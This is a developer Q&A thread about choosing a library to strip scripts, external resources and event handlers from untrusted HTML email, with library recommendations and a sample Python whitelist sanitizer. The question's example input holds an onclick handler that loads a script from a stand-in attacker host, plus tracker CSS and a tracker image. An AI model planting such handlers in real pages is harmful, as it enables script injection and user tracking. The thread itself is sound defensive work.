
What can I use to sanitize received HTML while retaining basic formatting?

This is a common problem, so I'm hoping it's been thoroughly solved for me.

In a system I'm doing for a client, we want to accept HTML from untrusted sources (HTML-formatted email and also HTML files), sanitize it so it doesn't have any scripting, links to external resources, and other security/etc. issues; and then display it safely while not losing the basic formatting. E.g., much as an email client would do with HTML-formatted email, but ideally without repeating the 347,821 mistakes that have been made (so far) in that arena. :-)

The goal is to end up with something we'd feel comfortable displaying to internal users via an iframe in our own web interface, or via the WebBrowser class in a .Net Windows Forms app (which seems to be no safer, possibly less so), etc. Example below.

We recognize that some of this may well muck up the display of the text; that's okay.

We'll be sanitizing the HTML on receipt and storing the sanitized version (don't worry about the storage part — SQL injection and the like — we've got that bit covered).

The software will need to run on Windows Server. COM DLL or .Net assembly preferred. FOSS markedly preferred, but not a deal-breaker.

What I've found so far:

  • The AntiSamy.Net project (but it appears to no longer be under active development, being over a year behind the main — and active — AntiSamy Java project).
  • Some code from our very own Jeff Atwood, circa three years ago (gee, I wonder what he was doing...).
  • The HTML Agility Pack (used by the AntiSamy.Net project above), which would give me a robust parser; then I could implement my own logic for walking through the resulting DOM and filtering out anything I didn't whitelist. The agility pack looks really great, but I'd be relying on my own whitelist rather than reusing a wheel that someone's already invented, so that's a ding against it.
  • The Microsoft Anti-XSS library

What would you recommend for this task? One of the above? Something else?


For example, we want to remove things like:

  • script elements
  • link, img, and such elements that reach out to external resources (probably replace img with the text "[image removed]" or some such)
  • embed, object, applet, audio, video, and other tags that try to create objects
  • onclick and similar DOM0 event handler script code
  • hrefs on a elements that trigger code (even links we think are okay we may well turn into plaintext that users have to intentionally copy and paste into a browser).
  • __________ (the 722 things I haven't thought of that are the reason I'm looking to leverage something that already exists)

So for instance, this HTML:

<!DOCTYPE html>
<html>
<head>
<title>Example</title>
<link rel="stylesheet" type="text/css" href="http://evil.example.com/tracker.css">
</head>
<body>
<p onclick="(function() { var s = document.createElement('script'); s.src = 'http://evil.example.com/scriptattack.js'; document.body.appendChild(s); })();">
<strong>Hi there!</strong> Here's my nefarious tracker image:
<img src='http://evil.example.com/xparent.gif'>
</p>
</body>
</html>

would become

<!DOCTYPE html>
<html>
<head>
<title>Example</title>
</head>
<body>
<p>
<strong>Hi there!</strong> Here's my nefarious tracker image:
[image removed]
</p>
</body>
</html>

(Note we removed the link and the onclick entirely, and replaced the img with a placeholder. This is just a small subset of what we figure we'll need to strip out.)

T.J. Crowder asked Dec 30 '10 10:12



4 Answers

This is an older but still relevant question.

We are using the HtmlSanitizer .Net library, which:

  • is open-source
  • is actively maintained
  • doesn't have the problems of the Microsoft Anti-XSS library
  • is unit tested against the OWASP XSS Filter Evasion Cheat Sheet
  • is purpose-built for this (in contrast to the HTML Agility Pack, which is a parser)

Also on NuGet

Julian answered Oct 17 '22 08:10


I sense you would definitely need a parser that can generate an XML/DOM tree, so that you can apply a filter to it and produce what you are looking for.

See if the HtmlTidy, Mozilla, or HtmlCleaner parsers can help. HtmlCleaner has a lot of configurable options that you might also want to look at, specifically the transform section, which lets you skip the tags you don't require.
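
The parse-then-filter idea can be sketched roughly as follows. This is only an illustration in Python using the standard library's html.parser, not one of the libraries named in this thread and not a vetted sanitizer. The whitelist contents, the class name WhitelistSanitizer, and the "[image removed]" placeholder (borrowed from the question) are assumptions made for the example.

```python
from html import escape
from html.parser import HTMLParser

# Hypothetical whitelist, for illustration only; a real policy needs review.
ALLOWED_TAGS = {"html", "head", "title", "body", "p", "br", "strong", "em",
                "b", "i", "u", "ul", "ol", "li", "blockquote", "pre"}
# Elements whose whole content is dropped, not just the tags themselves.
# If one of these is never closed, the rest of the input is dropped too.
DROP_WITH_CONTENT = {"script", "style", "object", "applet",
                     "audio", "video", "iframe"}
VOID_TAGS = {"br"}  # allowed tags that take no closing tag


class WhitelistSanitizer(HTMLParser):
    """Re-emits only whitelisted tags, with every attribute stripped."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0  # > 0 while inside a dropped element

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth += 1
            return
        if self.skip_depth:
            return
        if tag == "img":
            self.out.append("[image removed]")
        elif tag in ALLOWED_TAGS:
            # attrs is ignored, so onclick, href, style, src all disappear.
            self.out.append(f"<{tag}>")

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if not self.skip_depth and tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            # Re-escape text so decoded entities cannot turn into markup.
            self.out.append(escape(data, quote=False))


def sanitize(html_text):
    parser = WhitelistSanitizer()
    parser.feed(html_text)
    parser.close()
    return "".join(parser.out)


dirty = ('<p onclick="alert(1)"><strong>Hi there!</strong> '
         "<img src='http://evil.example.com/xparent.gif'>"
         "<script>alert(2)</script></p>")
print(sanitize(dirty))
# prints: <p><strong>Hi there!</strong> [image removed]</p>
```

Anything not on the whitelist (including a, link, embed, comments, and the doctype) is simply not re-emitted, which is the "deny by default" behaviour a whitelist is meant to give. A maintained library is still the safer choice, since it covers the many cases a sketch like this does not.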

Aravind Yarram answered Oct 17 '22 07:10


I would suggest another approach. If you control how the HTML is viewed, I would remove all threats by using an HTML renderer that doesn't have an ECMAScript engine or any XSS capability. I see you are going to use the built-in WebBrowser object and, rightly so, you want to produce HTML that cannot be used to attack your users.

I recommend looking for a basic HTML display engine, one that cannot parse or understand any of the scripting functionality that would make you vulnerable. All the JavaScript would then simply be ignored.

This does have another problem, though: you would need to ensure that the viewer you are using isn't susceptible to other types of attacks.

Andrew T Finnell answered Oct 17 '22 09:10


I suggest looking at http://htmlpurifier.org/. Their library is pretty complete.

seth answered Oct 17 '22 07:10